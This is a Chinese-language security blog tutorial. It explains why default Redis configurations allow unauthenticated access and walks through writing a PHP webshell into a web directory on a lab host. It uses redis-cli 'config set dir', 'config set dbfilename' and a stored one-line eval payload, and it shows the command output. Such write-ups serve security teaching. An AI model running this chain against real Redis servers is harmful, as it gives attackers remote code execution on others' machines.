Redis For Webshell
2019-08-14 本文已影响0人
RabbitMask
安全性(未授权访问)
其实在《Redis初步》中我们也提到了,redis默认是不会设置密码的,我们来分析下默认的conf文件来探究下它初始的安全性。
首先是密码,默认并未设置,需要requirepass password
手动指定,如果是自定义的conf文件,在redis-server
命令启动时为指定配置文件,同样不会生效。
# Require clients to issue AUTH <PASSWORD> before processing any other
# commands. This might be useful in environments in which you do not trust
# others with access to the host running redis-server.
#
# This should stay commented out for backward compatibility and because most
# people do not need auth (e.g. they run their own servers).
#
# Warning: since Redis is pretty fast an outside user can try up to
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
#
# requirepass foobared
其次是访问策略,默认是完全放开的0.0.0.0
访问机制。
# By default Redis listens for connections from all the network interfaces
# available on the server. It is possible to listen to just one or multiple
# interfaces using the "bind" configuration directive, followed by one or
# more IP addresses.
#
# Examples:
#
# bind 192.168.1.100 10.0.0.1
# bind 127.0.0.1
以上两条,便是网上广为流传的redis未授权访问漏洞成因,算漏洞么?算吧、但一切却又合情合理。
写权限(Get Webshell)
我们继续查看配置文件,dbfilename即导出的文件名称,这里当然默认为rdb文件,即在save操作时生成的存储文件。
# The filename where to dump the DB
dbfilename dump.rdb
dir 即“工作路径”,也就是上面提到的存储文件save的位置,这里默认为redis的根目录,如果我们设置为自定义的绝对路径自然是完全可行的。
# The working directory.
#
# The DB will be written inside this directory, with the filename specified
# above using the 'dbfilename' configuration directive.
#
# The Append Only File will also be created inside this directory.
#
# Note that you must specify a directory here, not a file name.
dir ./
最后呢,redis还有一个机制,可以通过config命令在控制台对上述参数进行set,虽说并不会更改conf文件,仅对此次redis生效,redis重启失效,但是!正是因为这种机制,导致我们的config set无需重启redis即可生效,那么,啰嗦完了,开始吧~
#redis-cli
192.168.1.254:6379> config set dir D:\Software\Phpstudy\PHPTutorial\WWW\DVWA
OK
192.168.1.254:6379> config set dbfilename rabbit.php
OK
192.168.1.254:6379> set webshell "<?php eval(@$_POST['a']);?>"
OK
192.168.1.254:6379> save
OK
#redis-server
[20424] 14 Aug 14:21:54.207 * DB saved on disk
成功在指定目录生成文件:
可正常解析,getshell success: